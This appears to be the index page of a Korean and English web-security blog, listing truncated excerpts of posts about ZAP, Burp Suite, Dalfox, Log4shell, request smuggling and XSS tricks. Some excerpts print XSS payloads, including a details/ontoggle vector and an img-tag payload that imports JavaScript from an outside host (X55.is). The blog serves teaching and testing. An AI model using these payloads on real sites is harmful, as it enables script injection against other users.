Gareth Heyes가 재미있는 XSS 트릭을 하나 공유했는데요. Browser가 이를 처리하는 방식을 잘 생각해보면, 여러 형태로 우회하는데 사용할 수 있을 것 같단 느낌이 들었습니다. 간단한 내용이니 한번 같이 살펴보시죠 😎 U+2029 XSS #!@*%
alert(1) 일반적으로 위와 같은 생긴 코드를 눈으로 ...

개발자만? 아니 우리도 스크래치 패드 필요해! Boop!

저는 종종 재미있는 앱이 있을지 앱스토어를 둘러보곤 합니다. 그러던 중 보안 테스팅에서 쓸만할 것 같은 도구를 찾아 이번 연휴동안 사용해보고, 괜찮다고 느껴서 블로그를 통해 공유해봅니다. 바로 Boop 입니다. Boop Boop는 개발자를 위한 scratch pad라고 생각하시면 좋습니다. 코드나 여러가지 데이터 등을 작성...

ZAP vs Burpsuite in my mind at 2022

Hi :D I’m going to compare ZAP and Burpsuite after a long time. Of course, it’s extremely subjective, so I hope you light enjoy it. ## TL;DR ZAP has powerful scripting engine a...

Authz0 v1.1 Released 🎉

Hi security engineers and hackers! Authz0 v1.1.0 has been released 🎉 First of all, I would like to thank many of you for your good feedback. Summary Add setCred command Add –in...

Chrome에선 이제 open 속성없이
XSS가 가능합니다.

XSS 벡터 중 details 태그에 ontoggle 이벤트 핸들러와 open 속성을 이용한 방법이 있습니다. Chrome, Safari, Firefox, IE 모두 사용 가능하고 on* 기반의 XSS 중 비교적 쉽게 사용자 interaction을 줄일 수 있어서 자주 사용되는데요. <details ontoggle=a...

안녕 Authz0, Authorization 테스트를 위한 새로운 도구 🚀

저는 Authorization 테스트 시 ZAP의 Zest Script를 즐겨서 사용합니다. 예전에는 Burpsuite에서 Authz라는 Extension을 자주 사용했었구요. 어쩄던 이 도구들은 ZAP과 Burpsuite에 내장되어 사용되기 때문에 HTTP Raw Request를 사용할 수 있다는 엄청난 강점이 있지만, ...

Zest와 ZAP! 강력한 보안 테스트 루틴을 만들어봐요 ⚡️

What is Zest Zest는 Mozilla 보안팀에서 만든 JSON 기반의 스크립팅 언어입니다. 보다 쉬운 웹 테스팅을 위해서 만들어졌고, 저는 테스팅 시 ZAP에서 자주 사용합니다. Zest in ZAP 사실 JSON 포맷 자체가 rewrite가 좋은 포맷은 아니라서(그래서 config는 yaml이나 toml을 ...

나의 메인 Weapon 이야기 ⚔️ (ZAP and Proxify)

한국 기준으로 새해까지 약 30분이 남았고, 올해의 글은 이 글이 마지막 글이 될 것 같습니다. 분명 2020 회고한지가 얼마 안된 것 같은데, 벌써 2021도 회고도 이미 지나버렸네요 😱 오늘은 제 회고 내용 중 하나인 Main Weapon에 대한 이야기를 하려고 합니다 :D Main Weapon? 여러분들은 분석 시 ...

Log4 2.17 JDBCAppender RCE(CVE-2021-44832)

또… 또나왔네요. 이전 글에서 한번에 쓰기에 너무 긴 내용이라 추가 CVE는 하나씩 분리해둘 생각입니다. History of Log4j RCE [2021-12-10] CVE-2021-44228 (RCE) [2021-12-14] CVE-2021-45046 (DOS / RCE) [2021-12-18] CVE-20...

ZAP의 새로운 Import/Export Addon, 그리고 미래에 대한 뇌피셜

최근에 ZAP 내 여러가지 Import, Save 관련 기능들이 “Import/Export”란 이름의 새로운 Addon으로 통합되었습니다. 사용자 Interface 상에선 변화가 없어서 크게 달라진 건 없지만 이를 통해 앞으로의 ZAP에서 Import/Export 기능에 대한 방향성을 엿볼 수 있어서 글로 작성해봅니다 😎 ...

Web Cache 취약점들을 스캐닝하자 🔭

Web Cache Poisoning, Web Cache Deception 등 Web Cache 관련 취약점은 나름 오래된 기법이지만 요 몇 년 사이 알비노왁스(@albinowax) 등 Portswigger의 연구원들에 의해 빠르게 발전한 것 같습니다. 이러한 취약점들은 여러가지 테스팅 방법을 통해서 식별하고 Exploit 하...

Dalfox 2.7 Released 🎉

Hi hackers! Dalfox v2.7 has been released 🎉🎉🎉 There are not many added features this release. But it’s better than before, so I recommend an update! Then let’s start the review. and...

ZAP과 Burpsuite에서 feedback 정보를 수집하지 못하도록 제한하기

최근에 ZAP의 Core addon 중 하나인 Callhome이 업데이트 되었습니다. 기존에 Callhome은 단순히 메인에 News 정보를 보여주기 위해 만들어진 기능인데, 이번에 Telemetry 관련 부분이 추가됬습니다. Telemetry는 ZAP 사용성 정보등을 수집하기 위한 기능인데요, ZAP쪽 설명으로는 취약점이...

Private OOB 테스팅을 위한 Self Hosted Interactsh

이번 주말은 log4shell로 인해 정말 인터넷이 불타고 있습니다. 자 이제 보안담당자들은 이를 대응하고 자산에 대해 스캐닝을 진행하게 될텐데, 여기서 식별에 사용하는 대표적인 방법인 OOB(Out-Of-Band)를 알려진 서비스들(ZAP OAST, Burpsuite collaborator, Interactsh 등)을 이용...

Log4shell 전 세계의 인터넷이 불타고 있습니다 🔥 (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)

네 바로 어제(2021-12-10) Java의 logging package인 log4j2 에서 RCE 0-day 취약점이 공개되었습니다. Service, Application에 로그를 쌓을수만 있다면 어떤 환경에서도 공격 가능성이 존재하고, 리스크가 RCE인 만큼 정말 전 세계가 불타오르고 있네요. (하하 DM도 터져나갑니다...

웹 해커를 위한 Browser Addons

여러분들은 보안 테스팅 시 웹 브라우저 Addon 많이 사용하시나요? 저는 한 떄 엄청나게 많이 설치해서 사용했지만, 지금은 5개 미만을 유지하는 것 같네요. 오늘은 보안 테스팅 시 유용한 Addon을 소개하고 제가 어떤식으로 변화하며 사용했는지 공유드릴까 합니다. TLDR | Name | F...

ZAP RootCA를 API와 Cli-Arguments로 제어하기

ZAP에 새로운 Addon이 추가됬습니다. 이 Addon을 이용하면 ZAP의 인증서, 즉 Root CA를 API나 Cli등으로 컨트롤할 수 있도록 기능이 지원됩니다. 이를 활용하면 Daemon 모드로 동작하거나 CI/CD Pipeline 등에서 사용 시 조금 더 쉽게 인증서 처리를 할 수 있게 됩니다. 오늘은 ZAP의 ...

DOM XSS? 그렇다면 Eval Villain

올해 초 Burpsuite에선 DOM Invador라는 도구를 공개했었습니다. 제가 가볍게 리뷰할 때에도 이야기드렸지만 DOM 기반 테스팅에선 굉장히 유용하기 때문에 Burpsuite 사용자는 물론 ZAP 등 다른 도구 사용자도 충분히 관심가지고 테스트 때 열어서 써봐야할 정도의 도구였었죠. 사실 다른 진영에서도 쓸 수 있...

ZAP Browser에서 Extension 영구 적용하기

최근 ZAP의 Extension 중 selenium 관련 업데이트가 있었습니다. 무심히 Change 내용을 봤다가 “Support for browser extension” 문구를 보자마자 반가운 마음에 바로 글 작성을 시작헀죠 😎 ZAP의 내장 브라우저인 ZAP Browser(Manual Explore)는 지금까지 Fi...

ZAP 스크립팅으로 빠르게 Fake Response 만들기

Response 변조는 인증 절차나 비즈니스 로직을 우회할 때 자주 사용되는 공격 방법 중 하나입니다. 보통은 proxy로 요청을 잡아 직접 response를 수정하여 continue 하는 형태로 테스트를 진행합니다. {"msg":"fail"} => {"msg":"success"} 가끔은 이 과정을 자주 반복하게 ...

Dalfox 2.6 Released 🎉

Wow! Dalfox 2.6.0 has finally been released! This time, I improved the focus on Result and PoC object. and a new global flag called –poc-type was added. Let’s play it quickly 😎 http...

Solving issue the POST scan in zap-cli not work

During the test, I found that POST-based scanning(active-scan / quick-scan) was not working in zap-cli 😱 This problem is zap-cli issue, and it has already been reported as an issue b...

New technic of HTTP Request Smuggling (chunked extension)

오랜만에 HRS(HTTP Request Smugglin) 관련 테크닉이 추가되었습니다. 아직 실제로 공격 가능했던 사례가 있는건 아니라 오피셜은 아니지만, 어느정도 신빙성이 있어서 글로 작성해봅니다. Chunked의 특징 HRS 취약점을 정확하게 이해하신 분이라면 chunked의 특징을 아마 잘 알고 계실겁니다. 그래도 한...

Amass + Scripting = 최고의 서브도메인 탐색

여러분들 Amass 많이 사용하시나요? Amass는 subdomain을 탐색하기 위한 도구들 중 하나로 ZAP과 마찬가지로 OWASP에 플래그쉽 프로젝트입니다. 또한 비슷한 도구인 subfinder, assetfinder, findomain 등 여러가지와 비교해봐도 거의 최고로 손꼽을 수 있는 도구입니다. 그만큼 엄청나게 ...

ZAP 2.11이 릴리즈되었습니다! 빠르게 리뷰하죠 ⚡️

드디어 ZAP 2.11 버전이 릴리즈 되었습니다 👏🏼🎉 2.9 ⇒ 2.10 만큼 큰 변화가 있는건 아니였지만, 그래도 ZAP Core팀에서 이야기하는 주요 개선사항에 대해 살펴보도록 하죠. 물론 큰 변화가 없다고 해도 전반적인 스캔 룰이나 AddOn들은 마이너 패치인 만큼 많이 업데이트 되긴 합니다. (PassiveRule...

403 forbidden을 우회하는 4가지 방법들

때때로 보안 테스팅 시 WAF나 Application의 로직에 따라 403 Forbidden 으로 접근이 제한되는 경우가 있습니다. 보통은 백엔드의 처리 로직을 봐야 정확하게 우회할 수 있는 포인트를 잡겠지만, 몇가지 트릭을 통해 Black Box Testing 상태에서도 이를 우회할 수 있습니다. 오늘은 403을 우회하는...

이제 Interact.sh 가 ZAP OAST에서 지원됩니다

최근에 ZAP OAST(Callback 기능)에 projectdiscovery의 Interactsh 지원이 추가되었습니다. 약 2주전에 commit 됬고 저도 인지한지 좀 됬었는데, 이제서야 글로 작성하네요 😁 What is Interactsh? Interactsh는 projectdiscovery에서 개발한 OOB(O...

ZAP update domains (core and addon)

최근에 ZAP의 업데이트 서버 주소 관련해서 확인할게 있어서 user-groups에 문의를 했었습니다. 덕분에 쉽게 업데이트 주소를 확인 했지만 메모해두면 좋을 내용들이 있어서 정리해서 글로 작성해둡니다. 우선 ZAP의 업데이트에 사용되는 도메인은 아래와 같습니다. Address De...

ZAP 2.11 Review ⚡️

최근에 Simon, ZAP 공식 트위터 계정에서 2.11에 대한 릴리즈가 임박했음을 알렸습니다. https://twitter.com/zaproxy/status/1440308206782222337 2.10 버전이 나온지 1년이 다되가고 있고, 최근 ZAP의 변화가 재미있던지라, 저는 한발 앞서 2.11에서 어떤 기능들이 적...

Dalfox 2.5 Released 🚀

There was a released minor version of Dalfox after a long time. Mainly performance improvement, it detects much better than before :D https://github.com/hahwul/dalfox/releases/tag/v...

ZAP Script-base Authentication

최근에 ZAP의 2가지 기능에 대해 이야기를 드렸었습니다. 바로 Authentication Spidering과 Access Control 테스트인데요. 이 2가지 기능의 핵심적인 부분은 ZAP에서 제공하는 Authentication과 User를 활용해서 로그인/로그아웃 플로우를 구현하는 것인데요. 오늘은 이 Authenti...

ZAP의 fuzz-script를 이용해 Fuzzing 스킬 올리기

여러분들은 Fuzzing 많이 하시나요? 웹해킹.. 아니 대다수 보안 테스팅에서 Fuzzing은 많은 시간을 차지 하기도 하고, 반대로 시간을 줄여주기도 합니다. 오늘은 웹 테스팅에서 ZAP을 이용해 Fuzzing할 때 Script를 이용해서 조금 더 나은 테스팅을 하는 방법에 대해 이야기하려고 합니다. ZAP Fuzzer...

OWASP TOP 10 2021 리뷰

와우 드디어 OWASP TOP 10 2021이 공개 되었습니다!!! 🤩 바뀐 부분, 새로 추가된 부분들을 살펴보면서 어떤 방향으로 흘러가는지 리뷰 해봅시다 :D OWASP TOP10 2021 Broken Access Control 네 드디어 BAC가 Injection을 누르고 1번을 차지했습니다. 예전에는 하나의 ...

Authentication Spidering in ZAP

최근 ZAP의 Auth(Authentication, Authorization) 관련 기능과 세션에 대한 부분을 파헤치고 있습니다. 제가 잘 모르고 사용하지 않았던 기능들인데, 알고나니 지금까지 약간 답답하게 일했던 제가 부끄러워지네요. 오늘은 이러한 부분들 중 하나인 Authentication Spidering에 대한 이야...

Testing Access-Control with ZAP

여러분들은 세션에 대한 접근 권한, Authorization에 대한 부분들을 점검하실 때 어떤 형태로 테스트하시나요? 저는 보통 ZAP의 ZEST Script를 사용하거나, BurpSuite 의 Authz 확장 기능을 이용하여 테스트 하곤 합니다. 사실 ZAP에는 Access Control이란 기능이 있어서 이런 것들을 ...

ZAP에 곧 추가될 FileUpload AddOn 살펴보기

최근에 ZAP Weekly 버전에 새로운 기능이 추가됬습니다. 바로 FileUpload 라는 AddOn 형태로 추가된 기능인데요, 이 기능은 File upload 관련 취약점을 식별하고 스캐닝할 수 있도록 도와주는 도구입니다. 요즘 ZAP의 기능 추가 속도로 보면 조만간 Release 버전에도 올라올 것 같은데요, 오늘...

Cache Busting과 보안 테스팅

Cache busting Cache busting은 보안쪽 테스팅에서 먼저 나온 개념은 아니고, 개발쪽에서 많이 사용되던 개념입니다. 웹 브라우저는 빠른 동작과 효율성을 위해서 리소스등을 캐시하고 있는데, 일반 사용자가 캐시를 리로드하는건 불편한 일입니다. (일반 사용자가 평상시에 hard refresh를 하진 않죠) 그...

Macos에서 LISTEN 중인 포트와 프로세스 쉽게 확인하기

저는 간혹 Macos의 native application에 대한 보안 테스팅을 진행할 때가 있는데요. 이 때 Application에서 binding, listening 하고 있는 포트를 확인하고 Endpoint를 찾아야할 때가 있습니다. netstat 등 여러 명령이 있겠지만, 개인적으론 lsof 를 통해 확인하는게 제일 ...

ZAP Automation GUI

최근에 ZAP Automation framework가 0.4 버전으로 업데이트 됬습니다. 사실 제가 0.4 버전을 기다린 것은 아래 내용 때문인데요, StackHawk에서 스트리밍으로 진행한 Automation Framework에 대한 소개 내용 중 ZAP에서 UI로 Automation Framework를 컨트롤하는 장면이 ...

If you need test Out-of-band on ZAP? Use OAST!

Hi hackers and geeks! Today, ZAP OAST was released as Alpha version. (As I told you on https://twitter.com/hahwul/status/1415710990608461827, OAST is a tool for identifying out-of-ba...

ZAP OAST 릴리즈! 이제 ZAP에서 Out-Of-Band가 더 쉬워집니다 🚀

오늘 ZAP OAST가 Alpha 버전으로 release 되었습니다. 지난번에 이야기드린대로 OAST는 callback 과 비슷하게 Out-Of-Band를 식별하기 위한 도구로 SSRF, RCE 등에서 굉장히 유용하게 사용할 수 있습니다. 겸사겸사 몇가지 살펴봤는데요, 지난번 글에서 예상했듯이 odiss.eu 도메인에 ...

COOP와 Site Isolation, 알고 있어야 할 구글 보안 정책의 변화

최근에 Google security blog에 site isolation 관련하여 글이 하나 올라왔습니다. 이는 구글이 앞으로의 웹 서비스의 보안을 위해서 적용하려고 하는 것들에 대한 내용이 있고, 이런 내용은 높은 확률로 표준처럼 자리잡을 수 있기 때문에 간단히 어떤 내용들이 있는지 살펴보고 글로 정리해두려고 합니다. ...

[Faraday#2] Dispatcher를 이용한 Scanning CI

이번 주말에는 틈틈히 Faraday 관련해서 계속 테스트해보고 있었습니다. 그 중 faraday_agent_dispatcher 라는 기능이 눈에 들어왔는데요, 이 기능은 faraday 서버에 여러 agent 붙여서 미리 지정 해둔 포맷 그리고 사용자가 전달해준 데이터 따라 스캐닝을 진행하고 결과를 faraday에 반영하는 기...

[Faraday#1] Penetration testing IDE!

혹시 faraday라고 들어보셨나요? pentesting 관련해서 조금 찾아보다 보면 한번 쯤은 들어볼 수 있는 framework로 저 또한 예전부터 관심이 있긴 했지만, 실제로 사용해볼 일이 없어서 블로그에도 소개해드린 적이 없었네요. (보통 전 pentest 시 msf + documents 도구면 충분하다 느꼈어서… ) ...

ZAP OAST 미리 구경하기 (for OOB)

ZAP developers에 컨텐츠 하나가 공유되었는데요 바로 OAST에 대한 내용이였습니다. OAST는 이번에 ZAP core team(akshath)에서 신규로 개발중인 AddOn입니다. 기존 zap callback 기능에 burp suite의 collaborator 와 같이 out-of-band를 쉽게 테스트할 수 있도...

ZAP Plug-n-Hack을 이용한 DOM/PostMessage 분석

Plug-n-Hack(PnH) Plug-n-hack, 즉 PnH는 Mozilla 보안팀이 제안한 표준으로 보안 도구와 브라우저간의 상호 작용을 쉽고 유용하게 할 수 있도록 만들어진 방법을 의미합니다. 이미 10년 가까이 되가는 기술로 초기에는 브라우저 console에서 보안 도구를 컨트롤 할 수 있는 형태로 구성되었지만, ...

Cross-origin iframe에서 alert과 confirm, prompt 사용 불가

최근 Chrome Platform Status에 새로운 내용이 하나 올라왔습니다. https://chromestatus.com/feature/5148698084376576 바로 Cross-origin의 iframe 환경에서 alert(), confirm(), prompt()를 사용할 수 없도록 제외되는 내용인데요. 간략하...

ZAP Scanning to Swagger Documents

OpenAPI in ZAP ZAP은 단순히 url 리스트를 import 하는 기능 이외에도 GraphQL endpoint나 OpenAPI를 import 하는 기능을 가지고 있습니다. 여기서 OpenAPI Import를 활용하면 보통 API Spec에 많이 사용되는 SwaggerUI의 doc 데이터를 가지고 Example 코드...

Customize request/response panel in ZAP

오늘은 ZAP의 소소한 팁 하나를 공유할까 합니다. 보통 Request/Response 탭은 Layout 정도만 변경하고 기본 값을 사용하는 경우가 많은데요 사실 ZAP의 Request/Response 탭은 생각보다 디테일하게 설정이 가능합니다. 그럼 한번 살펴봅시다. How to customize? ZAP의 대다수 ...

DOM Invader, BurpSuite의 DOM-XSS Testing 도구

아.. PortSwigger에서 또 물건 하나 만든 것 같습니다. PortSwigger의 BurpSuite 스캔 성능 중 손에 꼽는 부분이 바로 DOM Testing 부분입니다. 보통의 도구들은 DOM XSS를 찾기 위해 정해진 패턴을 headless browser로 렌더링하여 테스트하거나 js 코드 내 공격에 주로 사용되는...

ZAP Passive Scan Tags와 Neonmarker 그리고 Highlighter

많은 양의 Web URL을 분석하게 되면 눈에 잘 안들어오고, 중요한 부분들을 놓치기 마련인데 highlight 관련 기능들은 조금 더 중요한 포인트에 집중을 할 수 있도록 포인트를 잡아주기 때문에 개인적으로는 잘 활용하는게 분석함에 있어서 큰 도움이 된다고 생각합니다. 오늘은.. ZAP에서 Highlight에 관련된 내용...

ZAP의 새로운 Report Add-on, 'Report Generation'

오늘은 최근 ZAPCON 2021에서 공개된 Report Add-on인 Report Generation에 대해 이야기할까 합니다. ZAP의 리포팅 기능 ZAP은 OWASP에서 상당히 오래된 프로젝트 중 하나로 예전 도구들이 지향했던 HTML/PDF 등의 Report 기능을 지원하고 있었습니다. 물론 여기서 사용되는 UI/U...

PDF 암호화와 User-password 그리고 Owner-password

제가 최근에 pdfcrack을 통해 pdf 파일에 걸린 패스워드를 크랙하는 내용으로 글을 썼었는데요. 이는 pdf 파일 크랙떄문에 메모 차 작성한 글이였고, 오늘은 pdf 파일의 암호화 자체에 대해 이야기할까 합니다. 그럼 pdf의 암호화와 user-password, owner-password 에 대해 알아보도록 하죠. (간...

PDF 파일 Password Crack

pdf 패스워드 크랙할 일이 있어서 도구랑 간단하게 사용방법 메모해 둡니다 😁 Installation brew install pdfcrack Usage -b, --bench perform benchmark and exit -c, --charset=STRING Use the characters in STRING as c...

ZAP Automation

올 초에 처음 열린 ZAPCon 2021에서 ZAP Automation at Scale이란 세션이 있었습니다. 그 때 당시에는 그냥 ZAP Automation Addon을 통해 기존 자동화 작업을 좀 더 쉽게 구성할 수 있다 정도로 받아드렸었는데, 최근에 Scan Policy 관련해서 비슷한 고민을 하다보니 ZAP Autom...

ZAP Token Generation and Analysis 살펴보기

ZAP에는 Token Generation and Analysis란 Addon이 있습니다. 사실 이름만 보고 예전부터 설치는 해두었는데 한번도 사용하지 않았던 것 같네요.. 그래서 오늘 한번 사용해보고 정확히 어떤 도구인지, 어떤 용도로 사용할 수 있을지 글로 작성해봅니다. Install Token Generation and...

Bypass host validation with Parameter Pollution

오늘은 host validation 로직 우회 때 사용했던 간단한 팁 하나 공유해봅니다. 뭐 누구나 아는 내용이라 별거 없긴 하지만, 기록으로 남겨두어야 나중에 한번에 관련 내용들을 정리할 때 쉽게 찾고 사용할 수 있어서 블로그 글로 작성해둡니다. HTTP Parameter Pollution HTTP Parameter Po...

Options rule configuration in ZAP

ZAP에서 옵션쪽 좀 보다가 Rule configuration 이란 부분이 있는데, 제가 아는 일반적인 스캔 룰 설정이라는 달라서 긴가민가한 부분이 있어 내용 정리해둡니다. Options Rule Configuration 이름만 보면 마치 어떤스캔을 포함하고, 어떤 스캔을 포함하지 않을지 결정하는 룰 같지만 실제론 ac...

Dalfox 2.4 release! review with me!

Dalfox 2.4 features Summary Added payload mode Added using remote assets Added headless browser(only for domxss and inJS) Support to scanning URL Fragments(hash) Support ...

Evasion Tricks for CSS Injection

CSS(Style) Injection CSS Injection은 XSS나 HTML Injection과 같이 웹 상에서 CSS, 즉 스타일 시트에 Injetion이 가능한 경우를 의미합니다. 보통 사용자에게 직접적인 영향력이 있는건 아니지만, 스타일 시트 제어를 통해서 매핑된 이벤트 핸드러를 통해 XSS나 다른 기능을 수행시키...

The reverse tabnabbing has weakened more

Reverse tabnabbing은 리스크가 높은 공격은 아니지만 피싱에서 충분히 사용될 수 있기 때문에 보안을 조금 더 신경쓴다면 분명이 체크하고 가야할 부분입니다. 해당 공격에 대한 설명은 아래 링크를 참고해주세요. https://www.hahwul.com/cullinan/reverse-tabnabbing/ 이 공격에...

Import remote JS in IMG tag. for bypass XSS

밤에 트윗을 보다가 간단한 XSS 트릭을 봤는데 특별히 뭔가가 있는건 아니지만 가끔씩 CSP 우회에도 사용될 수 있을 것 같아 글로 작성해둡니다. Payloads <Img Src=//remote-xss-link OnLoad=import(src)> Example.. <Img Src=//X55.is On...

Secure JWT and Slinding Sessions

Sessions 이란? Sessions은 컴퓨팅에서 비슷하지만 여러 의미로 사용되는 용어입니다. 일반적으로 상태를 의미한다고 보면 될 것 같고, 웹에서는 HTTP가 비 연결형 프로토콜이기 때문에 서버가 기존에 접속했던 클라이언트인지 확인할 수 있는 수단으로 사용됩니다. (파일 쿠키랑 비슷하죠. 다만 처리에선 약간 다르긴합니다...

OOB Testing with interactsh!

OOB(Out-Of-Band)와 Callback 서버 SSRF, RCE 등에서 공격 페이로드의 성공 여부를 어떠한 방식으로 체크하시나요? 보통은 원격지의 서버를 두고 HTTP나 DNS 요청이 발생하는걸 감지해서 체크하곤 합니다. BurpSuite엔 이러한 작업을 위해 collaborator라는 아주 유용한 도구(사용자별로 별...

Get webpage screenshot with gowitness for CICD

What is gowitness gowitness는 버그바운티 커뮤니티에서 잘 알려진 도구로 대량의 URL을 대상으로 웹 스크린샷을 빠르게 찍을 수 있는 도구입니다. https://github.com/sensepost/gowitness 저도 예전부터 굉장히 잘 쓰고 있던 도구인데 지금보니 따로 블로그 글로 포스팅한 적이 ...

RCE with exposed k8s api

휴가중이라 피드나 트윗등을 자주 보진 못하지만 k8s RCE 관련하여 글이 있어서 가볍게 살펴보고 포스팅해봅니다. K8S REST API 보통 k8s는 kubectl이나 lens 같이 cli 또는 IDE를 사용하여 k8s를 많이 관리하곤 합니다. 단 k8s에는 다른 시스템과의 편리한 연동성 등을 위해서 REST API로 대...

OpenData for bug-bounty

최근에 개인 resources 페이지를 리뉴얼 했습니다. 기존에는 그냥 자주 사용하는 온라인 도구들의 링크 정도만 있었는데, 테스팅 / 워드리스트 / 버그바운티 도메인 등 관련해서 주기적으로 파일을 생성하여 공개하려고(어차피 거의 저만 쓰긴 하겠지만..) 간단하게 추가했습니다. 리스트를 뽑아보면 아래와 같습니다 :D ...

ZAP context based scanning

ZAP에서의 quickscan이나 spider, active scan 등을 기본적으로 다중 URL을 지원하지 않습니다. 그래서 예전에 아래 포스트와 같은 방법으로 API를 이용한 방법, 그리고 별도의 도구를 만들어서 스캔하는 방법을 사용하곤 했습니다. https://www.hahwul.com/2020/08/22/scansp...

well-known 디렉토리와 securty.txt 그리고 humans.txt

간혹 웹 페이지를 들여다보면 .well-known 디렉토리를 만나게됩니다. 제 사이트도 올 1월에 security.txt를 추가했었는데, 그 땐 단순히 보안 취약점이나 이슈에 대한 제보를 위해서 만들었었습니다. 오늘은 이 .well-known 디렉토리의 의미와 어떻게 사용되는지 조금더 살펴볼까 합니다. .well-kno...

How to set ZAP active scan input vector in daemon mode

What is ZAP Active Scan Input Vector? Active Scan Input Vector는 ZAP에서 Active Scan 시 Injection 영역을 의미합니다. 물론 특정 Injection 취약점을 의미하는 건 아니고 점검할 부분이라고 보시는게 더 적합합니다. ZAP의 기본값은 URL + POST로...

Make and change default scan policy in ZAP cli interface

ZAP Scan Policy ZAP은 Passive/Active Scan에 대한 정책을 커스텀하게 관리할 수 있도록 제공하고 있습니다. 이는 단순히 해당 스캔 모듈의 사용 여부 뿐만 아니라 Risk level도 조정할 수 있어 스캐너로 활용하기에도 좋습니다. 그래서인지 DevSecOps를 구축할 때 ZAP은 자주 거론되는 D...

ZAP Forced browse 와 Fuzz에서 Sync wordlist 사용하기

Forced Browse는 딕셔너리 기반 또는 단순 브루트포스릍 통해서 서비스에서 경로와 페이지를 식별하는 방법입니다. 아주 전통적이지만 Recon 측면에선 아직도 굉장히 중요한 부분이기도 합니다. 그래서 이러한 작업들을 위해서 기존의 dirsearch, dirbuster 등의 도구부터 최근 feroxbuster, gobus...

Openssl만 사용하여 웹 사이트에서 지원하는 SSL cipher suite 파악하기

보통 웹 사이트의 SSL에 대한 보안적인 체크는 잘 나와있는 여러 도구들이 있어서 쉽게 테스트할 수 있습니다. testssl.sh sslyze nmap nse 가끔 이러한 도구 없이 기본적인 환경에서만 테스트해야할 경우가 있을텐데 찾아본김에 정리해서 글로 남겨봅니다. Enum cipher suite usi...

Zest와 ZAP을 이용한 Semi-Automated Security Testing

What is Zest script Zest script는 ZAP에서 제공하는 스크립팅 언어로 ZAP 내부에서의 요청과 처리 등 많은 기능을 JSON 기반의 스크립트화 하고 사용/관리할 수 있는 언어입니다. BurpSuite 등 다른 메뉴얼 테스팅 도구에서는 없는 ZAP만의 강점인 기능이죠. JSON 포맷 Reco...

How to share other device settings in Axiom

제 Axiom 세팅은 주로 사용하는 맥북에 되어있습니다. 최근에 집에 있는 서버에도 동일하게 세팅하기 위해서 axiom-install을 진행했는데요, instance 정보를 새로 만드는 작업이 진행되었습니다. (이미 난 있는데?) 그래서 관련해서 문의해보니, 아직 기능이 개발된건 아니고 간단한 트릭으로 이종간의 동일한 세팅...

Autochrome - 빠르게 보안 테스트용 웹 브라우저 환경을 구성하자!

트윗 보던 중 처음보는 도구가 있어서 테스트해봤고, 쓸만한 것 같아 글로 공유합니다. 오늘 소개해드릴 도구는 빠르게 테스팅용 브라우저를 구성할 수 있는 autochrome입니다. autochrome autochrome은 ncc그룹이 만든 도구 중 크로미움 기반 테스팅 환경을 빠르게 구성해주는 도구입니다. 저를 비롯한 많...

How to applying IntelliJ theme in ZAP

어제 BurpSuite의 Customizer에 대한 글을 썼었습니다. BurpSuite에서 FlatLaf의 IntelliJ Theme를 사용할 수 있도록 지원해주는 확장 기능이였고, 글 말미와 댓글에도 작성했듯이 ZAP 또한 2.10 버전부터 FlatLaf를 사용하고 있기 때문에 구현이 가능할거란 생각이 들었었습니다. 개인...

Burp Customizer! Change your burpsuite theme

There has been a significant change in UI since version 2020.12 of Burp site. (Personally, I’m unsure) The most important part is the change of LAF(Look and Feel)’s class to PlateLaf...

Hack the browser extension 🚀 (웹 브라우저 확장 기능 취약점 점검하기)

새해 첫글입니다. 사실 12월 마지막 글로 작성하려고 했는데, 마무리를 못해서 새해 첫글이 되어버렸네요. 최근에 브라우저 확장 관련해서 기존에 알던 것 보다 조금 더 리서치할 일이 있었는데, 겸사겸사 정리할겸 분석 방법에 대해 글로 정리해봅니다. Background knowledge Background page backgr...

ToCToU를 이용한 검증 로직 우회하기(SSRF/OOB/XXE/ETC)

⚠️ SSRF에 관련된 내용은 Cullinan > SSRF에서 관리하고 있습니다. ToCToU를 포함하여 최신 데이터로 유지되고 있으니 참고 부탁드려요! What is ToCToU? ToCToU는 Time Of Check to Time Of Use의 약자로 시간차를 이용한 공격이며 보통 Race conditio...

Security considerations for browser extensions

브라우저 확장 기능의 보안 관련하여 테스트할게 필요하여 제가 알던 내용에 조금 더 리서치하여 글로 작성해 봅니다. 우선 브라우저 확장 기능은 웹 브라우저에 추가되는 작은 단위의 앱으로 Chrome / Safari / Firefox 등등 다수 브라우저에서 웹 브라우징, 광고차단, 각종 테스트 기능 등 여러 사용자들에게 서비스되...

ZAP 2.10 Review ⚡️

2020 마지막이 얼마 남지 않은 오늘 드디어 ZAP 2.10.0이 릴리즈 되었습니다. 그동안 dark mode 등을 이유로 weekly 버전을 사용했었는데, 이제는 공식 버전으로 넘어가도 좋을 것 같네요. 오늘은 가볍게 2.10.0 의 릴리즈 노트를 살펴보고, 몇가지 깨알같은 기능을 소개할까 합니다. ...

Why I Use ZAP

Army-Knife for AppSec Application Security 또는 Pentest, Bugbounty 등 전반적인 Offensive security 관련 일에서 가장 핵심적인 도구는 Burp/ZAP 과 같은 Proxy 도구입니다. 초기에는 Proxy 도구라는 성향이 강했지만, 이제는 Proxy 도구라기 보단 A...

Make cloud base ZAP Scanning Environment Using github-action

Hi hackers and bugbounty hunters :D Today, I talk about building a github-action-based ZAP scanning environment. As you know, there is no time limit for public repo, so you can confi...

Setup a Pentest environment with Axiom

What is Axiom Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud enviornments, build and deploy repeatable infrastructure focussed on offensive and d...

Docker scratch image from a Security perspective

최근 도커 관련해서 테스트하던 중 Scratch 라는 이미지를 보게 되었습니다. 개인적으론 처음보는 이미지인데, 특이하게도 보편적인 OS에서 사용되는 명령어부터 여러가지 중요한 바이너리나 설정까지 없는 독특한 이미지였죠. 찾다보니 생각보다 재미있는 이미지여서 관련 내용과 저의 생각을 약간 더해서 글을 작성해봅니다. Dock...

Building a ZAP Monitoring Environment (Grafana + InfluxDB + Statsd)

Hi hackers :D Here’s the first post of November! Recently, both in my companies and individuals are working on projects related to ZAP. So while I was looking at the options and fea...

Forcing HTTP Redirect XSS

TL;DR If you are in English, I hope you read this! I’ve tested more, but there’s no unusual pattern. If you’re curious about my story, try using a translator! not writing in two lang...

Amass, go deep in the sea with free APIs

There are several types of Subdomains scanning tools. Amass, Subfinder, findomain, etc… In my opinion, the tool at its peak is Amass, and many Bugbounty hunters have automated system...

앨리스(Alice)와 밥(Bob) 그리고 캐롤(Carol), 이름의 의미는?

